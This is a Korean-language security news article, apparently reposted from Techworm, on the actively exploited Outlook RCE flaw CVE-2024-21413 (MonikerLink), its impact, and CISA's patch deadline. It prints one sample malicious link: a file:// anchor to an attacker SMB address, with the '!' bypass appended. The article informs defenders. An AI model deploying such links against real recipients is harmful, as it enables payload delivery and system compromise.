사이버 보안 회사인 체크포인트는 Microsoft Outlook(아웃룩)에서 심각한 원격 코드 실행(RCE) 취약점을 발견했습니다. 이 취약점은 현재 활발한 사이버 공격에 악용되고 있으며, 전 세계 기업에 심각한 위협을 초래하고 있습니다.
이로 인해 사이버 보안 및 인프라 보안국(CISA)은 미국 연방 기관에 이러한 지속적인 공격으로부터 시스템을 보호하라고 경고했습니다.
Check Point 취약점 연구원인 하이페이 리(Haifei Li)는 CVE-2024-21413 (CVSS 점수 9.8) 으로 추적되는 심각도가 높은 RCE 취약점을 발견했습니다.
이 결함은 부적절한 입력 검증으로 인해 발생하며, 취약한 Microsoft Outlook(아웃룩) 버전을 사용하여 악성 링크가 포함된 이메일을 열 때 코드가 실행될 수 있습니다.
이 취약점을 성공적으로 악용하면 위협 행위자는 Office 보호 보기를 우회하여 보호 모드가 아닌 편집 모드에서 악성 파일을 열 수 있습니다.
또한 위협 행위자에게 데이터를 읽고, 쓰고, 삭제할 수 있는 권한을 포함하여 상승된 권한을 부여할 수도 있습니다.
Microsoft는 1년 전에 CVE-2024–21413 취약점을 해결하면서 미리 보기 창 자체가 공격 벡터가 될 수 있다고 경고했습니다.
따라서 Outlook(아웃룩)에서 악성 이메일을 보는 것만으로도 익스플로잇이 실행될 수 있어 매우 위험할 수 있습니다.
Check Point에 따르면 공격자는 Moniker Link라는 취약점을 악용합니다. 이는 Outlook을 속여 안전하지 않은 파일을 열도록 하는 방법입니다.
이를 통해 위협 행위자는 file:// 프로토콜을 사용하여 이메일에 포함된 악성 링크에 대한 기본 제공 Outlook 보호 기능을 우회할 수 있습니다.
공격자는 파일 URL에 느낌표와 임의의 텍스트를 추가하여 악성 파일을 신뢰할 수 있는 리소스로 처리하도록 Outlook을 조작할 수 있습니다.
공격자가 제어하는 서버를 가리키는 URL에 파일 확장자 바로 뒤에 느낌표를 삽입하고 무작위 텍스트를 추가하면 시스템을 속여 악성 페이로드를 실행할 수 있습니다.
예를 들어, 공격자는 아래와 같이 링크를 만들 수 있습니다.
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>클릭하세요</a>
피해자가 링크를 클릭하면 Outlook(아웃룩)은 공격자의 서버에서 파일을 검색하여 상승된 권한으로 실행하여 공격자에게 시스템을 제어할 수 있는 권한을 부여합니다.
CVE-2024-21413 취약점은 Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, Microsoft Office 2019를 포함한 여러 Microsoft Office 제품에 영향을 미쳤습니다.
이 취약점이 적극적으로 악용되자 CISA는 알려진 악용 취약점(KEV) 카탈로그에 CVE-2024-21413을 추가했습니다.
2021년 11월 구속력 있는 운영 지침(BOD) 22-01에 따라 연방 기관은 2025년 2월 27일까지 시스템에 패치를 적용하고 잠재적 위협으로부터 네트워크를 보호할 시간을 갖게 되었습니다.
사이버 보안 기관은 목요일에 "이러한 유형의 취약성은 악의적인 사이버 행위자에게 빈번한 공격 벡터이며 연방 기업에 상당한 위험을 초래합니다." 라고 경고했습니다.
CVE-2024-21413은 야생에서 활발하게 악용되고 있으며 Outlook 사용자에게 심각한 보안 위험을 초래합니다.
따라서 민간 기관에서는 잠재적인 침해를 방지하기 위해 즉시 패치를 적용하고 사이버 보안 방어를 강화하는 것이 좋습니다.
*참고한 원본 글: https://www.techworm.net/2025/02/microsoft-outlook-rce-bug-exploited-attacks.html
댓글